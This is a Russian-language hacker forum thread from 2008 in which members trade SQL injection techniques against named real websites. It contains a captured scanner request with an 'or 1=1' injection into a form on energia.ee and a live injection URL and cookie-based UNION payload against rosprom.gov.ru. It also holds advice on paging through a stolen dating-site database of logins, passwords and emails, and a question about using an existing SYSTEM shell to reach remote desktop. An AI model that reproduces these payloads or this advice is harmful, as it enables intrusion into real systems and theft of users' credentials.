 |
|
30.04.2008, 17:16
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
POST /index.php?id=211 HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.energia.ee
Content-Length: 282
Connection: Close
Pragma: no-cache
Acunetix-Product: WVS/5.5 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
html_enabled=1&subject=Elektritarne%20pakkumine%20 L%C3%A4tis%20v%C3%B5i%20Leedus&locationData=979%3A tt_content%3A3514&Ettev%C3%B5te="+or+1%3D1+--+&Kontaktisik=111-222-1933email@address.tst&Telefon=111-222-1933email@address.tst&Epost=111-222-1933email@address.tst&formtype_mail=Saada
Орёт,что скуля. Пробывал постами меняя параметры заставить отреагировать серв,но ему поф даже на 1+and+0=0 и 1+and+1=1
Менял параметры, как только мог. Есть тут инжект или нету?
|
|
|
30.04.2008, 17:36
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
но ему поф даже на 1+and+0=0 и 1+and+1=1
Что ты хотел этим сказать? 0_о
|
|
|
|
30.04.2008, 18:21
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Сообщение от n0ne
Что ты хотел этим сказать? 0_о
моя хотело сказать,что ему абсолютно ПОФ,тобишь он возвращает одинаковый результат,обрезает чели,потому что при смени ид меняется только страница )),а запросы он как будто ваще не видит: )
|
|
|
|
30.04.2008, 18:45
|
|
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
С нами:
9984161
Репутация:
56
|
|
по моему правильнее было так сделать =1+1 или =2-1 если страница та же то инжекта нет...
|
|
|
|
30.04.2008, 19:19
|
|
Banned
Регистрация: 24.04.2008
Сообщений: 10
С нами:
9498626
Репутация:
6
|
|
при подключение через mstsc.exe пишет Эудалённые подключения запрещены"
как запустить? есть шелл на удалённой системе к которой произвожу коннэкт.
права system
|
|
|
|
30.04.2008, 19:33
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
Велемир, а ты не думал, что 0 всегда равен нулю, как и 1 всегда будет равна самой себе?)) ты бы попробовал 1=2 и делал выводы. Ещё попробуй к id -1 подставлять и т.п.
|
|
|
|
30.04.2008, 19:35
|
|
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
С нами:
9740547
Репутация:
93
|
|
http://www.rosprom.gov.ru/oorg.php?id=-13+or+1=concat_ws(0x2,user(),database(),version())--
Я так понял, что с этого ничего нельзя поиметь?
|
|
|
|
30.04.2008, 20:03
|
|
Новичок
Регистрация: 07.04.2008
Сообщений: 1
С нами:
9523788
Репутация:
0
|
|
всем привет
частенько сталкиваюсь с извлечением большого количество данных из баз данных.
можно ли как-нибудь начать извлекать данные начиная к примеру с 20.000'ой записи?
К примеру:
Имеем дейтинг-сайт с логинами/пассами/мылами на 20к пользователей. В месяц региться ещё порядка 1к. Можно ли определённым запросом вывести на эран инфу начиная с 20.000? Чтобы не качать заново всю информацию полностью?
Спасибо всем ответившим =)
|
|
|
|
30.04.2008, 20:05
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
.acme
при обращении к скрипту http://www.rosprom.gov.ru/oorg.php
в куки прописывай id=-999 union select 1,2,3,4,5/*
__________________
Карфаген должен быть разрушен...
|
|
|
|
30.04.2008, 20:07
|
|
Познающий
Регистрация: 22.02.2008
Сообщений: 74
С нами:
9587456
Репутация:
120
|
|
Сообщение от Indio
всем привет
частенько сталкиваюсь с извлечением большого количество данных из баз данных.
можно ли как-нибудь начать извлекать данные начиная к примеру с 20.000'ой записи?
К примеру:
Имеем дейтинг-сайт с логинами/пассами/мылами на 20к пользователей. В месяц региться ещё порядка 1к. Можно ли определённым запросом вывести на эран инфу начиная с 20.000? Чтобы не качать заново всю информацию полностью?
Спасибо всем ответившим =)
Пользуйся лимитом (LIMIT 20000,100) к примеру
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
